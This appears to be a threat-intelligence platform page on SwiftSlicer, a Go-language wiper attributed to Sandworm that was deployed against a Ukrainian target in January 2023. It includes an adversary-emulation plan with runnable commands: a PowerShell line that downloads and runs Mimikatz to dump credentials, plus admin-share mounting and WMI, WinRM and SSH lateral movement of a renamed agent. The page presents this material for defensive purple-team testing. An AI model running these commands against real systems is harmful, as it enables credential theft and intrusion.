Home/Threat Actor/SwiftSlicer
Threat Actor

SwiftSlicer

swiftslicer · russia_apt_sandworm · active since 2023-01

SwiftSlicer (canonical ESET naming per January 27, 2023 disclosure.

ESET detection signature WinGo/ KillFiles.C) is a Go (Golang) programming language wiper deployed January 25, 2023 by Sandworm against an unnamed Ukrainian target via Active Directory Group Policy, the 6th Sandworm wiper strain targeting Ukraine since February 2022 invasion per Cybernews count.

Russian state-sponsored APT attribution to Sandworm (Russian GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard / CERT-UA UAC-0082 / Dragos ELECTRUM, curated separately as sandworm_team parent operator) via ESET canonical January 27, 2023 disclosure (Robert Lipovsky senior malware researcher ESET, per ESET Research Twitter thread: "On January 25th ESETResearch discovered a new cyberattack in Ukraine. Attackers deployed a new wiper we named SwiftSlicer using Active Directory Group Policy. The SwiftSlicer wiper is written in Go programming language. We attribute this attack to Sandworm") + CERT-UA UAC-0082 tracking.

standalone malware platform cluster paralleling prestige_ransomware + ransomboggs in 2023+ Sandworm destructive cyberweapon evolution cell.

cluster- defining destruction mechanism per ESET technical analysis: "Once executed it deletes shadow copies, recursively overwrites files located in %CSIDL_SYSTEM%\drivers, %CSIDL_SYSTEM_DRIVE%\Windows\ NTDS and other non-system drives and then reboots computer. For overwriting it uses 4096 bytes length block filled with randomly generated bytes"; cluster-defining Windows domain destruction intent via NTDS folder targeting, per Bleeping Computer: "the malware targets the %CSIDL_SYSTEM_DRIVE%\Windows\ NTDS folder, showing that SwiftSlicer tries to destroy files and bring down the entire Windows domain".

cluster-defining Active Directory Group Policy deployment via Domain Policy Modification (Group Policy Modification), same deployment tradecraft as HermeticWiper + CaddyWiper indicating domain controller compromise prerequisite per ESET: "deployed through Group Policy, which suggests that the attackers had taken control of the victim's Active Directory environment. Some of the wipers spotted by ESET in Ukraine early into Russia's invasion - HermeticWiper and CaddyWiper - were in some instances also planted in the same fashion" (cluster-cell coherence with v0.1.130 hermeticwiper.yaml + v0.1.130 caddywiper.yaml AD GPO deployment pattern)

cluster-defining Go (Golang) programming language wiper development per ESET + Bleeping Computer + Help Net Security, "Sandworm developed SwiftSlicer in Golang programming language, which has been adopted by multiple threat actors for its versatility, and it can be compiled for all platforms and hardware" (signature Sandworm tradecraft evolution toward cross-platform multi-OS destructive capability, distinct Go codebase from Prestige C++ + RansomBoggs .NET demonstrating Sandworm multi-language destructive capability); concurrent CERT-UA-disclosed Ukrinform Ukrainian National News Agency attack January 17-25, 2023 attributed to UAC-0082 (suspected Sandworm) deploying 5 different wipers (CaddyWiper + ZeroWipe + SDelete + AwfulShred + BidSwipe) targeting Windows + Linux + FreeBSD systems per CERT-UA Twitter "UAC-0082 (suspected Sandworm) to target Ukrinform using 5 variants of destructive software" (signature operational tempo + multi-OS multi-wiper signature late-January 2023)

VirusTotal submission January 26, 2023 (one day after detection) with ~half AV engines detecting at publication per Bleeping Computer (relatively rapid industry response); SentinelOne January 2024 "The Nightmare Of Destructive Malware | From Wiper To SwiftSlicer" by Natacha Bakir (Senthorus/Cefcys) consolidates SwiftSlicer as canonical illustration of wiper malware evolution from MeteorExpress to AcidRain to HermeticWiper to SwiftSlicer pattern.

Cybernews canonical 6th Sandworm wiper strain classification (HermeticWiper February 2022 + IsaacWiper February 2022 + HermeticRansom February 2022 + CaddyWiper March 2022 + DoubleZero March 2022 - SwiftSlicer January 2023 with Industroyer2 April 2022 + Prestige October 2022 + RansomBoggs November 2022 between)

ESET DynoWiper January 30, 2026 retrospective catalogs SwiftSlicer in chronological Sandworm destructive malware family (HermeticWiper + HermeticRansom + CaddyWiper + DoubleZero + ARGUEPATCH + ORCSHRED + SOLOSHRED + AWFULSHRED + Prestige ransomware + RansomBoggs ransomware + SDelete-based wipers + BidSwipe + ROARBAT + SwiftSlicer + NikoWiper + SharpNikoWiper + ZEROLOT + Sting wiper + ZOV wiper)

cluster fills Go-language wiper position in 2023+ Sandworm destructive cyberweapon evolution cell.

canonical illustration of Windows domain destruction via NTDS folder targeting + cross-platform Go-language wiper evolution + signature 4096-byte block overwrite tradecraft cited in essentially all subsequent Sandworm + Ukraine war + Go-language wiper + AD GPO wiper deployment industry analyses through 2023- 2026 period.

russia_apt_sandworm confidence: high 12 aliases
Sigma rules200 YARA rules0 Live IOCs0 CVEs exploited0

Profile

SwiftSlicer (canonical ESET naming per January 27, 2023 disclosure.

ESET detection signature WinGo/ KillFiles.C) is a Go (Golang) programming language wiper deployed January 25, 2023 by Sandworm against an unnamed Ukrainian target via Active Directory Group Policy, the 6th Sandworm wiper strain targeting Ukraine since February 2022 invasion per Cybernews count. Russian state-sponsored APT attribution to Sandworm (Russian GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard / CERT-UA UAC-0082 / Dragos ELECTRUM, curated separately as sandworm_team parent operator cluster) via ESET canonical attribution (Robert Lipovsky senior malware researcher ESET) + CERT-UA UAC-0082 tracking. Standalone malware platform cluster paralleling prestige_ransomware + ransomboggs in the 2023+ Sandworm destructive cyberweapon evolution cell.

Operational target profile
  • Unnamed Ukrainian target (specific not disclosed by ESET)
  • Active Directory environment prerequisite.
  • Windows domain destruction intent (NTDS folder targeting)
  • Cross-platform potential per Go cross-compile capability Operational attack architecture: (1) Domain controller compromise prerequisite: attackers gained control of victim's Active Directory environment (2) Active Directory Group Policy deployment (cluster-defining cluster-cell coherence): SwiftSlicer deployed via Domain Policy Modification (Group Policy Modification), same deployment tradecraft as HermeticWiper + CaddyWiper (cluster-cell coherence with v0.1.130 hermeticwiper.yaml + caddywiper.yaml). (3) Shadow copy deletion: VSS shadow copies deleted to inhibit recovery (4) Recursive file overwrite (cluster-defining): targets %CSIDL_SYSTEM%\drivers + %CSIDL_SYSTEM_DRIVE%\ Windows\NTDS + non-system drives. NTDS folder targeting indicates Active Directory domain controller destruction intent. (5) 4096-byte length blocks with randomly generated bytes (cluster-defining): overwrite mechanism (6) Force reboot after destruction (signature): system reboot completes destructive operation Signature operational tradecraft:.
  • Go (Golang) programming language wiper (cluster- defining 2023 evolution): cross-platform multi-OS capability, versatile cross-compile per Bleeping Computer / Help Net Security.
  • Active Directory Group Policy deployment (cluster- defining cluster-cell coherence): same tradecraft as HermeticWiper + CaddyWiper.
  • Windows domain destruction via NTDS folder targeting (cluster-defining): signature AD destruction intent.
  • 6th Sandworm wiper strain since February 2022 invasion (signature chronological milestone): per Cybernews count.
  • Distinct Go codebase from Prestige (C++) + RansomBoggs (.NET) demonstrating Sandworm multi- language destructive capability evolution.
  • Concurrent Ukrinform multi-wiper attack January 17-25, 2023 (signature operational tempo): 5 different wipers (CaddyWiper + ZeroWipe + SDelete + AwfulShred + BidSwipe) targeting Windows + Linux + FreeBSD per CERT-UA UAC-0082.
  • Cluster-cell coherence with v0.1.130 hermeticwiper + caddywiper AD GPO deployment pattern.
  • Sample compiled for Windows targeting (Go's cross- platform implies future variants possible) The cluster fills the Go-language wiper position in the 2023+ Sandworm destructive cyberweapon evolution cell + canonical illustration of Windows domain destruction via NTDS folder targeting tradecraft.

Aliases

12
swiftslicerswift slicerswiftslicer_malwareswiftslicer_wiperwingo killfiles cwingo_killfiles_cwin go killfiles cswiftslicer january 2023 ukraine sandwormswiftslicer golang go wiperswiftslicer active directory group policy deploymentswiftslicer 6th sandworm wiper strainswiftslicer windows ntds destruction

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile Worm - Move laterally any way possible. Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns

10
2026ESET DynoWiper January 2026 Retrospective Catalog
2023-2026Continued Industry Reference Status (2023-2026)
2023SwiftSlicer Initial Deployment + ESET Detection (January 25, 2023)
2023ESET Canonical Disclosure (January 27, 2023)
2023SwiftSlicer Destruction Mechanism Signature
2023Go (Golang) Programming Language Signature
2023Ukrinform National News Agency Concurrent Attack (January 17, 2023)
20236th Sandworm Wiper Strain Classification (Cybernews January 30, 2023)
2023VirusTotal Submission (January 26, 2023)
2022-2023Cluster-Cell Coherence with HermeticWiper + CaddyWiper AD GPO Deployment Pattern

Attribution & Reporting

Attributed by
ESET WeLiveSecurity (canonical January 27, 2023 disclosure, Robert Lipovsky senior malware researcher)ESET Research Twitter (@ESETresearch, real-time January 27, 2023 disclosure thread)ESET DynoWiper January 2026 retrospective (SwiftSlicer cataloged in chronological Sandworm destructive malware family)CERT-UA Ukrainian Computer Emergency Response Team (canonical UAC-0082 Sandworm attribution + Ukrinform concurrent attack disclosure)Microsoft Threat Intelligence Center (IRIDIUM / Seashell Blizzard Sandworm canonical tracking)Mandiant / Google Cloud Threat Intelligence Group (APT44 Sandworm canonical tracking)CrowdStrike (Voodoo Bear canonical Sandworm tracking)Tenable (canonical Sandworm APT SwiftSlicer wiper using AD GPO analysis)SentinelOne (canonical destructive malware From Wiper To SwiftSlicer analysis, Natacha Bakir Senthorus/Cefcys)The Hacker News (canonical Robert Lipovsky interview coverage)Bleeping Computer (canonical SwiftSlicer destroy Windows domains reporting)Help Net Security (canonical wiper glut Ukrainian targets reporting, Zeljka Zorz)Cybernews (canonical 6th Sandworm wiper strain reporting)TechSpot (canonical SwiftSlicer + Ukrinform reporting)Conquer Your Risk (canonical Sandworm's Way AD wiper deployment analysis)US Department of Justice (October 15, 2020 indictment of 6 GRU Unit 74455 officers)MITRE ATT&CK + Malpedia industry consensus
Key reporting
reportESET WeLiveSecurity: SwiftSlicer, New destructive wiper malware strikes Ukraine (January 27, 2023), canonical disclosure
reportESET Research Twitter (@ESETresearch): January 27, 2023 BREAKING disclosure thread with Sandworm attribution
reportESET Ireland blog mirror: SwiftSlicer canonical disclosure
reportESET DynoWiper January 30, 2026 retrospective: SwiftSlicer cataloged in chronological Sandworm destructive malware family
reportRobert Lipovsky (ESET senior malware researcher): canonical commentary via The Hacker News
reportCERT-UA Ukrainian Computer Emergency Response Team: canonical UAC-0082 Sandworm attribution + Ukrinform concurrent attack disclosure
reportTenable: Sandworm APT Deploys New SwiftSlicer Wiper Using Active Directory Group Policy
reportSentinelOne (Natacha Bakir Senthorus/Cefcys): The Nightmare Of Destructive Malware, From Wiper To SwiftSlicer (January 2024)
reportThe Hacker News: Ukraine Hit with New Golang-based 'SwiftSlicer' Wiper Malware in Latest Cyber Attack
reportBleeping Computer: Hackers use new SwiftSlicer wiper to destroy Windows domains
reportHelp Net Security (Zeljka Zorz): A glut of wiper malware hits Ukrainian targets
reportCybernews: Brand new wiper malware SwiftSlicer, now sixth Sandworm strain targeting Ukraine
reportTechSpot: Researchers identify new data-wiping malware in cyberattack against Ukraine
reportConquer Your Risk: The Sandworm's Way, Wiper Deployment via Active Directory
reportMicrosoft Threat Intelligence Center: IRIDIUM / Seashell Blizzard canonical Sandworm tracking (SwiftSlicer adjacent attribution)
reportMandiant / Google Cloud Threat Intelligence Group: APT44 Sandworm canonical tracking
reportCrowdStrike: Voodoo Bear canonical Sandworm tracking
reportUS Department of Justice: October 15, 2020 indictment of 6 GRU Unit 74455 officers
reportMITRE ATT&CK Software S1140: SwiftSlicer
reportMalpedia Software Profile: SwiftSlicer

Operational

State sponsor

Russian state-sponsored APT, Sandworm (Russian GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard / CERT-UA UAC-0082 / Dragos ELECTRUM, curated separately as sandworm_team parent operator cluster). Attribution chain: (1) ESET canonical January 27, 2023 disclosure: ESET Research (@ESETresearch) published Twitter thread with Sandworm attribution. Per ESET: "On January 25th ESETResearch discovered a new cyberattack in Ukraine.

Attackers deployed a new wiper we named SwiftSlicer using Active Directory Group Policy. The SwiftSlicer wiper is written in Go programming language. We attribute this attack to Sandworm." (2) ESET WeLiveSecurity January 27, 2023 canonical blog post: published "SwiftSlicer: New destructive wiper malware strikes Ukraine" by ESET Research Team.

Per Robert Lipovsky (senior malware researcher) via The Hacker News: "Attackers deployed the SwiftSlicer wiper using Group Policy of Active Directory." (3) CERT-UA Ukrainian Computer Emergency Response Team canonical UAC-0082 attribution: CERT-UA tracks Sandworm as UAC-0082. Concurrent Ukrinform news agency attack January 17-25, 2023 attributed to UAC-0082 (suspected Sandworm) per CERT-UA Twitter with 5 different wipers (CaddyWiper + ZeroWipe + SDelete + AwfulShred + BidSwipe targeting Windows + Linux + FreeBSD systems). (4) CISA + Five Eyes consensus: Sandworm attributed to Russia GRU Unit 74455 (also Main Center for Special Technologies GTsST) per multi-agency consensus.

(5) MITRE ATT&CK + industry consensus: SwiftSlicer attributed to Sandworm (Unit 74455) per multi-vendor consensus (ESET primary + Mandiant APT44 + CrowdStrike Voodoo Bear + Tenable + SentinelOne). Operational mission objective: Destructive wiper operation with Windows domain destruction intent. Per ESET: SwiftSlicer "deletes shadow copies, recursively overwrites files located in %CSIDL_SYSTEM%\drivers, %CSIDL_SYSTEM_DRIVE%\ Windows\NTDS and other non-system drives and then reboots computer." NTDS folder targeting indicates Active Directory domain controller destruction tradecraft.

Per Bleeping Computer: "SwiftSlicer was developed in Golang programming language, which has been adopted by multiple threat actors for its versatility, and it can be compiled for all platforms and hardware." Operationally implies Sandworm tradecraft evolution toward cross-platform multi-OS destructive capability.

Operational target profile
  • Unnamed Ukrainian target (specific target not disclosed by ESET)
  • Active Directory environment prerequisite (Group Policy deployment vector)
  • Windows domain destruction intent (NTDS folder targeting)
  • Cross-platform potential per Go cross-compile capability The cluster fills the Go-language wiper position in the 2023+ Sandworm destructive cyberweapon evolution cell + signature Active Directory domain destruction tradecraft.
Motivations
ukrainian_organization_destruction_via_go_language_wiper_2023_continued_capability, sandworm_continued_destructive_cyberweapon_capability_demonstration_2023, windows_domain_destruction_via_ntds_folder_targeting_signature, active_directory_group_policy_deployment_tradecraft_continuity_with_hermeticwiper_caddywiper, go_golang_cross_platform_multi_os_destructive_capability_evolution, russian_strategic_objective_continued_ukrainian_disruption_2023, sixth_sandworm_wiper_strain_since_february_2022_invasion_continued_destructive_pattern
Sectors
Regions

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma)55/60 · 91%
Analytics (MITRE CAR)34/60 · 56%
Runtime / container (Falco)5/60 · 8%
File / malware (YARA)0/60 · 0%
Network (Suricata/Snort)16/60 · 26%
Vuln scan (Nuclei)0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
SANDWORM SEASHELL BLIZZARD IRIDIUM UAC-0082 ATTRIBUTION CHAINSDELETE MICROSOFT SYSINTERNALS UTILITY WIPER VARIANTSDELETE WIPERSHADOW COPY DELETIONSWIFTSLICER CROSS PLATFORM CROSS COMPILE CAPABILITYSWIFTSLICER GO GOLANG PROGRAMMING LANGUAGE WIPERSWIFTSLICER MALWARE
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin